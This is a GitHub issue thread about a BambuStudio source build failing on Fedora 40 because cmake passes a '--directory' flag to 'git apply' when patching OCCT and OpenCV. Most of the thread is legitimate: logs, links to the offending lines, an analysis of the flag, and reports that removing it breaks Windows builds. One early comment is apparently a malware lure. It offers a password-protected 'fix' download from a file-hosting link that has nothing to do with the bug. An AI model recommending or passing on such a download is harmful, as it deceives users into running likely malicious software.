bambulab/BambuStudio #4689: `--directory` parameter in cmake files for OCCT and OpenCV cause build to fail in Fedora 40

9strands, 2024-08-26:
### Bambu Studio Version

01.09.04.60

### Where is the application from?

Built from source by yourself or others

### OS version

Fedora 40

### Additional system information

x86_64

### Printer

Bambu Lab A1

### How to reproduce

Attempt to build from source with "./BuildLinux.sh -d" 

### Actual results

[3/49] Performing patch step for 'dep_OCCT'
FAILED: dep_OCCT-prefix/src/dep_OCCT-stamp/dep_OCCT-patch /home/user/projects/BambuStudio/deps/build/dep_OCCT-prefix/src/dep_OCCT-stamp/dep_OCCT-patch 
cd /home/user/projects/BambuStudio/deps/build/dep_OCCT-prefix/src/dep_OCCT && /usr/bin/git apply --directory deps/build/dep_OCCT-prefix/src/dep_OCCT --verbose --ignore-space-change --whitespace=fix /home/user/projects/BambuStudio/deps/OCCT/0001-OCCT-fix.patch && /usr/bin/cmake -E touch /home/user/projects/BambuStudio/deps/build/dep_OCCT-prefix/src/dep_OCCT-stamp/dep_OCCT-patch
Checking patch deps/build/dep_OCCT-prefix/src/dep_OCCT/CMakeLists.txt...
error: deps/build/dep_OCCT-prefix/src/dep_OCCT/CMakeLists.txt: No such file or directory
Checking patch deps/build/dep_OCCT-prefix/src/dep_OCCT/src/Font/Font_FTFont.cxx...
error: deps/build/dep_OCCT-prefix/src/dep_OCCT/src/Font/Font_FTFont.cxx: No such file or directory
[4/49] Performing install step for 'dep_OpenCSG'
[0/1] Install the project...
-- Install configuration: "Release"

-- Build files have been written to: /home/user/projects/BambuStudio/deps/build
[1/41] Performing patch step for 'dep_OCCT'
FAILED: dep_OCCT-prefix/src/dep_OCCT-stamp/dep_OCCT-patch /home/user/projects/BambuStudio/deps/build/dep_OCCT-prefix/src/dep_OCCT-stamp/dep_OCCT-patch 
cd /home/user/projects/BambuStudio/deps/build/dep_OCCT-prefix/src/dep_OCCT && /usr/bin/git apply --directory deps/build/dep_OCCT-prefix/src/dep_OCCT --verbose --ignore-space-change --whitespace=fix /home/user/projects/BambuStudio/deps/OCCT/0001-OCCT-fix.patch && /usr/bin/cmake -E touch /home/user/projects/BambuStudio/deps/build/dep_OCCT-prefix/src/dep_OCCT-stamp/dep_OCCT-patch
Checking patch deps/build/dep_OCCT-prefix/src/dep_OCCT/CMakeLists.txt...
error: deps/build/dep_OCCT-prefix/src/dep_OCCT/CMakeLists.txt: No such file or directory
Checking patch deps/build/dep_OCCT-prefix/src/dep_OCCT/src/Font/Font_FTFont.cxx...
error: deps/build/dep_OCCT-prefix/src/dep_OCCT/src/Font/Font_FTFont.cxx: No such file or directory

### Expected results

Clean build comes after removing the `--directory path/to/directory` directive in the respective cmake files.  Once this is done, the dependency build completes cleanly

### Project file & Debug log uploads

Offending lines are here:

https://github.com/bambulab/BambuStudio/blob/267943be17dfd4f232589153990a06fdbffe42ad/deps/OCCT/OCCT.cmake#L11
https://github.com/bambulab/BambuStudio/blob/267943be17dfd4f232589153990a06fdbffe42ad/deps/OpenCV/OpenCV.cmake#L10

After cleaning `deps/build` with `rm -rf build then manually modifying those two files to remove the `--directory path/to/dir` directive to git apply, the patches apply cleanly and then build correctly.

### Checklist of files to include

- [ ] Log file
- [ ] Project file

masooddahmedd, 2024-08-26:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

9strands, 2024-08-26:
This isn't a gcc issue, it's an issue with how git-apply is being used by cmake.

MackBambu, 2024-08-27:
Thanks, I'll do some tests to verify that it compiles fine on other platforms.

9strands, 2024-08-27:
Thanks @MackBambu

After compiling the AppImage on Fedora 40, everything is working with the above fix on the latest run after installing these packages:
libOSMesa-devel 
libOSMesa
webkit2gtk4.0-devel
webkit2gtk4.0

I've had another Fedora-user test it out with me and the AppImage now works for them as well.

None of the available appImages from the release would run for me once I tried to access the Devices Tab - it would instantly die.

MackBambu, 2024-09-20:
@9strands I did some testing and the patch doesn't work on windows.
https://github.com/MackBambu/BambuStudio/actions/runs/10960028994/job/30433699219#step:7:617
[image]

MasonMayjack, 2024-12-18:
Saved the day, cheers

9strands, 2025-01-30:
Thanks @MackBambu - I'll try another build soon - the one I got working above is still performing quite well for me but with the new firmware release, it's probably time to kick it again.

phantasyconcepts, 2025-01-30:
For OCCT, try the fix in https://github.com/bambulab/BambuStudio/issues/4158.  It works for me on CentOS9 Stream.  I will look at OpenCV, since I am not running and do not have Windows installed on my system.

jpalazz2, 2025-02-17:
I'm running into this build issue on arch for both the OCCT and OpenCV dependencies.

I did a bit of digging to understand the change in #4158 is working:
1. By default CMake executes the provided `PATCH_COMMAND` from the directory in which it places the source files obtained with `ExternalProject_add` (You can verify by changing this to `PATCH_COMMAND=pwd` and looking at the working directory that gets printed after running `make`)
2. In this case that working directory will be `<name>-prefix/src/<name>` (per the defaults based on CMake documentation)
3. Both dependencies are seemingly trying to pass this particular directory explicitly to the `--directory` flag
4. This seems to result in `git apply` trying to apply the patch at `<name>-prefix/src/<name>` when the working directory _is_ already `<name>-prefix/src/<name>` and thus all the files specified in the patch file don't exist
5. I did some testing with `git apply`. Turns out that if you specify `--directory` and your patch then triggers a modification to a file that doesn't exist, **the command exist with a non-zero return code** (whereas if you omitted `--directory` this behavior does not result in an error)The fix in #4158 fixes the build because the attempt to patch files that don't exist fails silently rather than causing an error and exiting the build.

Based on the above findings, it seems like the above build is seemingly broken or wrong. After removing the flag I can clearly see that the patches are applied properly to the downloaded sources prior to running the remainder of the build.

MackBambu, 2025-03-19:
@jpalazz2 
Removing the --directory parameter works fine on Fedora and other Unix-like systems, but it does not work properly on Windows. You can check the github action logs . Can you make it compatible with Windows ?